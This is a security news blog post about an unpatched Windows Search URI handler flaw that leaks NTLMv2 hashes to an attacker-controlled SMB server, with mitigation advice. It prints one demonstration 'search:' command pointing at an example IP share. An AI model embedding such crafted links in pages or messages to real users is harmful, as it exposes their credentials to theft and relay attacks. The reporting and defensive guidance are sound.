Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Unresolved Windows Search Vulnerability Risks NTLMv2 Hash Theft

Unresolved Windows Search Vulnerability Risks NTLMv2 Hash Theft

Posted on June 3, 2026 By CWS

In a recent development in network security, experts have unveiled a significant flaw in the Windows Search URI handler that risks exposing users’ NTLMv2 hashes. This newly identified vulnerability mirrors a previous issue with the Windows Snipping Tool, documented as CVE-2026-33829, which involved the ms-screensketch: URI handler and was resolved by Microsoft earlier this year.

This vulnerability, like CVE-2026-33829, can be exploited through the use of a crafted link embedded in web pages or emails. Should a user interact with such a link, their computer may connect to an SMB server controlled by an attacker, leading to the exposure of the NTLMv2 hash, a critical piece of information that can be exploited for unauthorized access.

Understanding the Search URI Handler Flaw

The identified issue lies within the search: URI handler. Similar to the Snipping Tool’s vulnerability, the search function fails to validate input parameters effectively. Instead of using “filePath,” the search URI uses “crumb=location:” to initiate requests to any UNC path specified, thereby triggering NTLM authentication and leaking the NTLMv2 hash.

A demonstration command, such as start "" "search:query=test&crumb=location:\10.0.1.100share", showcases how an attacker could exploit this flaw. This method of attack has been highlighted by security researcher Andrew Schwartz from Huntress, and shares the same moderate severity rating as its predecessor.

Potential Impact and Recommendations

The implications of this vulnerability are significant. By capturing the NTLMv2 hash, malicious actors could perform relay attacks, gaining further access to vulnerable networks. Despite the risks, Microsoft has declined to issue a patch, as it does not meet their criteria for critical severity issues. This decision leaves users at potential risk without a formal resolution.

To mitigate this threat, security professionals recommend blocking outbound SMB traffic (TCP/445 and TCP/139) on systems where it is unnecessary, enforcing SMB signing to prevent hash relay, and disabling NTLM authentication where feasible.

Future Considerations

The exposure of NTLMv2 hashes remains a pressing concern in network security, highlighting the need for robust defensive measures. Organizations are advised to remain vigilant and implement recommended security practices to protect against potential exploits. The cybersecurity community continues to advocate for more stringent criteria for vulnerability patches to ensure user safety.

As cybersecurity threats evolve, staying informed and proactive is essential in safeguarding digital environments. Continued research and responsible disclosure will play critical roles in addressing such vulnerabilities.

The Hacker News Tags:CVE-2026-33829, Cybersecurity, Microsoft security, network security, NTLM authentication, NTLMv2 hash, SMB relay attacks, unpatched vulnerability, URI handler, Windows vulnerability

Post navigation

Previous Post: Critical Flaw in Microsoft 365 Android Apps Risked User Accounts
Next Post: New HTTP/2 Exploit Threatens Major Web Servers

Related Posts

VirusTotal Finds 44 Undetected SVG Files Used to Deploy Base64-Encoded Phishing Pages VirusTotal Finds 44 Undetected SVG Files Used to Deploy Base64-Encoded Phishing Pages The Hacker News
Helping CISOs Speak the Language of Business Helping CISOs Speak the Language of Business The Hacker News
Ivanti Zero-Day Vulnerability Impacts Dutch and EU Agencies Ivanti Zero-Day Vulnerability Impacts Dutch and EU Agencies The Hacker News
GemStuffer Exploits RubyGems for U.K. Council Data Exfiltration GemStuffer Exploits RubyGems for U.K. Council Data Exfiltration The Hacker News
New Android Trojan ‘Herodotus’ Outsmarts Anti-Fraud Systems by Typing Like a Human New Android Trojan ‘Herodotus’ Outsmarts Anti-Fraud Systems by Typing Like a Human The Hacker News
Experts Reports Sharp Increase in Automated Botnet Attacks Targeting PHP Servers and IoT Devices Experts Reports Sharp Increase in Automated Botnet Attacks Targeting PHP Servers and IoT Devices The Hacker News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Critical Linux Kernel Vulnerability Exploitation Alert
  • Minecraft Malware Spread through YouTube and SEO Tactics
  • Cyber Attack Exposes Global Stock Exchange Data
  • Understand Your Network from an Attacker’s Viewpoint
  • Critical CRLF Vulnerability in Laravel Threatens Email Security

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Critical Linux Kernel Vulnerability Exploitation Alert
  • Minecraft Malware Spread through YouTube and SEO Tactics
  • Cyber Attack Exposes Global Stock Exchange Data
  • Understand Your Network from an Attacker’s Viewpoint
  • Critical CRLF Vulnerability in Laravel Threatens Email Security

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark